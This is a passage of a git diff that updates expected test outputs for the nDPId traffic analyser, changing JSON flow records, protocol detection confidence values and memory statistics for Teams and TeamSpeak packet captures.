+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1587041693597,"flow_last_seen":1587041695591,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693515,"flow_last_seen":1587041693640,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695422,"flow_last_seen":1587041695432,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693611,"flow_last_seen":1587041697663,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1587041693654,"flow_last_seen":1587041697713,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1745,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693582,"flow_last_seen":1587041693698,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693668,"flow_last_seen":1587041697714,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695421,"flow_last_seen":1587041695433,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","packets-captured":2817,"packets-processed":2775,"total-skipped-flows":0,"total-l4-payload-len":1327851,"total-not-detected-flows":1,"total-guessed-flows":2,"total-detected-flows":80,"total-detection-updates":50,"total-updates":0,"current-active-flows":0,"total-active-flows":83,"total-idle-flows":83,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":597,"global_ts_msec":1587041698021} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","packets-captured":2817,"packets-processed":2775,"total-skipped-flows":0,"total-l4-payload-len":1327851,"total-not-detected-flows":1,"total-guessed-flows":2,"total-detected-flows":80,"total-detection-updates":59,"total-updates":0,"current-active-flows":0,"total-active-flows":83,"total-idle-flows":83,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":606,"global_ts_msec":1587041698021} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2817/2775 ~~ skipped flows.............: 0 @@ -603,9 +612,9 @@ ~~ total active/idle flows...: 83/83 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7284384 bytes -~~ total memory freed........: 7284384 bytes -~~ total allocations/frees...: 121678/121678 +~~ total memory allocated....: 6733827 bytes +~~ total memory freed........: 6733827 bytes +~~ total allocations/frees...: 124322/124322 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 184 chars ~~ json string max len.......: 1949 chars diff --git a/test/results/teamspeak3.pcap.out b/test/results/teamspeak3.pcap.out index 6863774ab..74b8af7ee 100644 --- a/test/results/teamspeak3.pcap.out +++ b/test/results/teamspeak3.pcap.out @@ -2,10 +2,10 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946745680740} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946745680740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946745680740,"pkt":"REREREREZmZmZmZmCABFAAA+yVhAAHgRnjQKAAABCgAAAs\/DJwMAKptdVFMzSU5JVDEAZQAAiA3QV2YAX1kW4K3na2EAAAAAAAAAAA=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teamspeak3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946745680740,"flow_last_seen":946745680740,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946745680740,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"10.0.0.2","src_port":53187,"dst_port":9987,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TeamSpeak","breed":"Acceptable","category":"VoIP"}} 